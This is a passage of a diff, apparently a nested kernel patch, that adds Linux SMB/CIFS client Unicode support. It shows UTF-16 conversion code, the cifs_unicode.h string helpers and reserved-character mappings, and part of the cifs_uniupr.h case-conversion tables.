++				put_unaligned(dst_char, &target[j]);
++			}
++			continue;
++
++unknown:
++			dst_char = cpu_to_le16(0x003f);
++			charlen = 1;
++		}
++
++ctoUTF16:
++		/*
++		 * character may take more than one byte in the source string,
++		 * but will take exactly two bytes in the target string
++		 */
++		i += charlen;
++		put_unaligned(dst_char, &target[j]);
++	}
++
++ctoUTF16_out:
++	put_unaligned(0, &target[j]); /* Null terminate target unicode string */
++	kfree(wchar_to);
++	return j;
++}
++
++/*
++ * cifs_local_to_utf16_bytes - how long will a string be after conversion?
++ * @from - pointer to input string
++ * @maxbytes - don't go past this many bytes of input string
++ * @codepage - source codepage
++ *
++ * Walk a string and return the number of bytes that the string will
++ * be after being converted to the given charset, not including any null
++ * termination required. Don't walk past maxbytes in the source buffer.
++ */
++
++static int
++cifs_local_to_utf16_bytes(const char *from, int len,
++			  const struct nls_table *codepage)
++{
++	int charlen;
++	int i;
++	wchar_t wchar_to;
++
++	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
++		charlen = codepage->char2uni(from, len, &wchar_to);
++		/* Failed conversion defaults to a question mark */
++		if (charlen < 1)
++			charlen = 1;
++	}
++	return 2 * i; /* UTF16 characters are two bytes */
++}
++
++/*
++ * cifs_strndup_to_utf16 - copy a string to wire format from the local codepage
++ * @src - source string
++ * @maxlen - don't walk past this many bytes in the source string
++ * @utf16_len - the length of the allocated string in bytes (including null)
++ * @cp - source codepage
++ * @remap - map special chars
++ *
++ * Take a string convert it from the local codepage to UTF16 and
++ * put it in a new buffer. Returns a pointer to the new string or NULL on
++ * error.
++ */
++__le16 *
++cifs_strndup_to_utf16(const char *src, const int maxlen, int *utf16_len,
++		      const struct nls_table *cp, int remap)
++{
++	int len;
++	__le16 *dst;
++
++	len = cifs_local_to_utf16_bytes(src, maxlen, cp);
++	len += 2; /* NULL */
++	dst = kmalloc(len, GFP_KERNEL);
++	if (!dst) {
++		*utf16_len = 0;
++		return NULL;
++	}
++	cifsConvertToUTF16(dst, src, strlen(src), cp, remap);
++	*utf16_len = len;
++	return dst;
++}
+diff --git a/fs/smb/client/cifs_unicode.h b/fs/smb/client/cifs_unicode.h
+new file mode 100644
+index 0000000000000..80b3d845419fa
+--- /dev/null
++++ b/fs/smb/client/cifs_unicode.h
+@@ -0,0 +1,404 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * cifs_unicode:  Unicode kernel case support
++ *
++ * Function:
++ *     Convert a unicode character to upper or lower case using
++ *     compressed tables.
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *
++ * Notes:
++ *     These APIs are based on the C library functions.  The semantics
++ *     should match the C functions but with expanded size operands.
++ *
++ *     The upper/lower functions are based on a table created by mkupr.
++ *     This is a compressed table of upper and lower case conversion.
++ */
++#ifndef _CIFS_UNICODE_H
++#define _CIFS_UNICODE_H
++
++#include <asm/byteorder.h>
++#include <linux/types.h>
++#include <linux/nls.h>
++
++#define  UNIUPR_NOLOWER		/* Example to not expand lower case tables */
++
++/*
++ * Windows maps these to the user defined 16 bit Unicode range since they are
++ * reserved symbols (along with \ and /), otherwise illegal to store
++ * in filenames in NTFS
++ */
++#define UNI_ASTERISK    (__u16) ('*' + 0xF000)
++#define UNI_QUESTION    (__u16) ('?' + 0xF000)
++#define UNI_COLON       (__u16) (':' + 0xF000)
++#define UNI_GRTRTHAN    (__u16) ('>' + 0xF000)
++#define UNI_LESSTHAN    (__u16) ('<' + 0xF000)
++#define UNI_PIPE        (__u16) ('|' + 0xF000)
++#define UNI_SLASH       (__u16) ('\\' + 0xF000)
++
++/*
++ * Macs use an older "SFM" mapping of the symbols above. Fortunately it does
++ * not conflict (although almost does) with the mapping above.
++ */
++
++#define SFM_DOUBLEQUOTE ((__u16) 0xF020)
++#define SFM_ASTERISK    ((__u16) 0xF021)
++#define SFM_QUESTION    ((__u16) 0xF025)
++#define SFM_COLON       ((__u16) 0xF022)
++#define SFM_GRTRTHAN    ((__u16) 0xF024)
++#define SFM_LESSTHAN    ((__u16) 0xF023)
++#define SFM_PIPE        ((__u16) 0xF027)
++#define SFM_SLASH       ((__u16) 0xF026)
++#define SFM_SPACE	((__u16) 0xF028)
++#define SFM_PERIOD	((__u16) 0xF029)
++
++/*
++ * Mapping mechanism to use when one of the seven reserved characters is
++ * encountered.  We can only map using one of the mechanisms at a time
++ * since otherwise readdir could return directory entries which we would
++ * not be able to open
++ *
++ * NO_MAP_UNI_RSVD  = do not perform any remapping of the character
++ * SFM_MAP_UNI_RSVD = map reserved characters using SFM scheme (MAC compatible)
++ * SFU_MAP_UNI_RSVD = map reserved characters ala SFU ("mapchars" option)
++ *
++ */
++#define NO_MAP_UNI_RSVD		0
++#define SFM_MAP_UNI_RSVD	1
++#define SFU_MAP_UNI_RSVD	2
++
++/* Just define what we want from uniupr.h.  We don't want to define the tables
++ * in each source file.
++ */
++#ifndef	UNICASERANGE_DEFINED
++struct UniCaseRange {
++	wchar_t start;
++	wchar_t end;
++	signed char *table;
++};
++#endif				/* UNICASERANGE_DEFINED */
++
++#ifndef UNIUPR_NOUPPER
++extern signed char CifsUniUpperTable[512];
++extern const struct UniCaseRange CifsUniUpperRange[];
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++extern signed char CifsUniLowerTable[512];
++extern const struct UniCaseRange CifsUniLowerRange[];
++#endif				/* UNIUPR_NOLOWER */
++
++#ifdef __KERNEL__
++int cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
++		    const struct nls_table *cp, int map_type);
++int cifs_utf16_bytes(const __le16 *from, int maxbytes,
++		     const struct nls_table *codepage);
++int cifs_strtoUTF16(__le16 *, const char *, int, const struct nls_table *);
++char *cifs_strndup_from_utf16(const char *src, const int maxlen,
++			      const bool is_unicode,
++			      const struct nls_table *codepage);
++extern int cifsConvertToUTF16(__le16 *target, const char *source, int maxlen,
++			      const struct nls_table *cp, int mapChars);
++extern int cifs_remap(struct cifs_sb_info *cifs_sb);
++extern __le16 *cifs_strndup_to_utf16(const char *src, const int maxlen,
++				     int *utf16_len, const struct nls_table *cp,
++				     int remap);
++#endif
++
++wchar_t cifs_toupper(wchar_t in);
++
++/*
++ * UniStrcat:  Concatenate the second string to the first
++ *
++ * Returns:
++ *     Address of the first string
++ */
++static inline __le16 *
++UniStrcat(__le16 *ucs1, const __le16 *ucs2)
++{
++	__le16 *anchor = ucs1;	/* save a pointer to start of ucs1 */
++
++	while (*ucs1++) ;	/* To end of first string */
++	ucs1--;			/* Return to the null */
++	while ((*ucs1++ = *ucs2++)) ;	/* copy string 2 over */
++	return anchor;
++}
++
++/*
++ * UniStrchr:  Find a character in a string
++ *
++ * Returns:
++ *     Address of first occurrence of character in string
++ *     or NULL if the character is not in the string
++ */
++static inline wchar_t *
++UniStrchr(const wchar_t *ucs, wchar_t uc)
++{
++	while ((*ucs != uc) && *ucs)
++		ucs++;
++
++	if (*ucs == uc)
++		return (wchar_t *) ucs;
++	return NULL;
++}
++
++/*
++ * UniStrcmp:  Compare two strings
++ *
++ * Returns:
++ *     < 0:  First string is less than second
++ *     = 0:  Strings are equal
++ *     > 0:  First string is greater than second
++ */
++static inline int
++UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	while ((*ucs1 == *ucs2) && *ucs1) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int) *ucs1 - (int) *ucs2;
++}
++
++/*
++ * UniStrcpy:  Copy a string
++ */
++static inline wchar_t *
++UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
++{
++	wchar_t *anchor = ucs1;	/* save the start of result string */
++
++	while ((*ucs1++ = *ucs2++)) ;
++	return anchor;
++}
++
++/*
++ * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
++ */
++static inline size_t
++UniStrlen(const wchar_t *ucs1)
++{
++	int i = 0;
++
++	while (*ucs1++)
++		i++;
++	return i;
++}
++
++/*
++ * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
++ *		string (length limited)
++ */
++static inline size_t
++UniStrnlen(const wchar_t *ucs1, int maxlen)
++{
++	int i = 0;
++
++	while (*ucs1++) {
++		i++;
++		if (i >= maxlen)
++			break;
++	}
++	return i;
++}
++
++/*
++ * UniStrncat:  Concatenate length limited string
++ */
++static inline wchar_t *
++UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
++
++	while (*ucs1++) ;
++	ucs1--;			/* point to null terminator of s1 */
++	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
++		ucs1++;
++		ucs2++;
++	}
++	*ucs1 = 0;		/* Null terminate the result */
++	return (anchor);
++}
++
++/*
++ * UniStrncmp:  Compare length limited string
++ */
++static inline int
++UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int) *ucs1 - (int) *ucs2;
++}
++
++/*
++ * UniStrncmp_le:  Compare length limited string - native to little-endian
++ */
++static inline int
++UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int) *ucs1 - (int) __le16_to_cpu(*ucs2);
++}
++
++/*
++ * UniStrncpy:  Copy length limited string with pad
++ */
++static inline wchar_t *
++UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = *ucs2++;
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrncpy_le:  Copy length limited string with pad to little-endian
++ */
++static inline wchar_t *
++UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = __le16_to_cpu(*ucs2++);
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrstr:  Find a string in a string
++ *
++ * Returns:
++ *     Address of first match found
++ *     NULL if no matching string is found
++ */
++static inline wchar_t *
++UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	const wchar_t *anchor1 = ucs1;
++	const wchar_t *anchor2 = ucs2;
++
++	while (*ucs1) {
++		if (*ucs1 == *ucs2) {
++			/* Partial match found */
++			ucs1++;
++			ucs2++;
++		} else {
++			if (!*ucs2)	/* Match found */
++				return (wchar_t *) anchor1;
++			ucs1 = ++anchor1;	/* No match */
++			ucs2 = anchor2;
++		}
++	}
++
++	if (!*ucs2)		/* Both end together */
++		return (wchar_t *) anchor1;	/* Match found */
++	return NULL;		/* No match */
++}
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * UniToupper:  Convert a unicode character to upper case
++ */
++static inline wchar_t
++UniToupper(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(CifsUniUpperTable)) {
++		/* Latin characters */
++		return uc + CifsUniUpperTable[uc];	/* Use base tables */
++	} else {
++		rp = CifsUniUpperRange;	/* Use range tables */
++		while (rp->start) {
++			if (uc < rp->start)	/* Before start of range */
++				return uc;	/* Uppercase = input */
++			if (uc <= rp->end)	/* In range */
++				return uc + rp->table[uc - rp->start];
++			rp++;	/* Try next range */
++		}
++	}
++	return uc;		/* Past last range */
++}
++
++/*
++ * UniStrupr:  Upper case a unicode string
++ */
++static inline __le16 *
++UniStrupr(register __le16 *upin)
++{
++	register __le16 *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * UniTolower:  Convert a unicode character to lower case
++ */
++static inline wchar_t
++UniTolower(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(CifsUniLowerTable)) {
++		/* Latin characters */
++		return uc + CifsUniLowerTable[uc];	/* Use base tables */
++	} else {
++		rp = CifsUniLowerRange;	/* Use range tables */
++		while (rp->start) {
++			if (uc < rp->start)	/* Before start of range */
++				return uc;	/* Uppercase = input */
++			if (uc <= rp->end)	/* In range */
++				return uc + rp->table[uc - rp->start];
++			rp++;	/* Try next range */
++		}
++	}
++	return uc;		/* Past last range */
++}
++
++/*
++ * UniStrlwr:  Lower case a unicode string
++ */
++static inline wchar_t *
++UniStrlwr(register wchar_t *upin)
++{
++	register wchar_t *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = UniTolower(*up);
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++
++#endif
++
++#endif /* _CIFS_UNICODE_H */
+diff --git a/fs/smb/client/cifs_uniupr.h b/fs/smb/client/cifs_uniupr.h
+new file mode 100644
+index 0000000000000..7b272fcdf0d3a
+--- /dev/null
++++ b/fs/smb/client/cifs_uniupr.h
+@@ -0,0 +1,239 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (c) International Business Machines  Corp., 2000,2002
++ *
++ * uniupr.h - Unicode compressed case ranges
++*/
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * Latin upper case
++ */
++signed char CifsUniUpperTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 060-06f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
++	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32, -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
++	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
++	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
++	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
++	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
++	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
++};
++
++/* Upper case range - Greek */
++static signed char UniCaseRangeU03a0[47] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 3b0-3bf */
++	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
++	-63, -63,
++};
++
++/* Upper case range - Cyrillic */
++static signed char UniCaseRangeU0430[48] = {
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 430-43f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 440-44f */
++	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, 0, -80, -80,	/* 450-45f */
++};
++
++/* Upper case range - Extended cyrillic */
++static signed char UniCaseRangeU0490[61] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
++	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
++};
++
++/* Upper case range - Extended latin and greek */
++static signed char UniCaseRangeU1e00[509] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
++	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
++	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
++	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112, 126, 126, 0, 0,	/* 1f70-1f7f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
++	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
++	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Upper case range - Wide latin */
++static signed char UniCaseRangeUff40[27] = {
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* ff40-ff4f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++};
++
++/*
++ * Upper Case Range
++ */
++const struct UniCaseRange CifsUniUpperRange[] = {
++	{0x03a0, 0x03ce, UniCaseRangeU03a0},
++	{0x0430, 0x045f, UniCaseRangeU0430},
++	{0x0490, 0x04cc, UniCaseRangeU0490},
++	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
++	{0xff40, 0xff5a, UniCaseRangeUff40},
++	{0}
++};
++#endif
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * Latin lower case
++ */
++signed char CifsUniLowerTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 040-04f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0, 0, 0, 0,	/* 050-05f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 0c0-0cf */
++	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 0,	/* 0d0-0df */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
++	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
++	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0, 0,	/* 170-17f */
++	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79, 0,	/* 180-18f */
++	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
++	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
++	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
++};
++
++/* Lower case range - Greek */
++static signed char UniCaseRangeL0380[44] = {
++	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 390-39f */
++	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/* Lower case range - Cyrillic */
++static signed char UniCaseRangeL0400[48] = {
++	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 0, 80, 80,	/* 400-40f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 410-41f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 420-42f */
++};
++
++/* Lower case range - Extended cyrillic */
++static signed char UniCaseRangeL0490[60] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
++	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
++};
++
++/* Lower case range - Extended latin and greek */
++static signed char UniCaseRangeL1e00[504] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
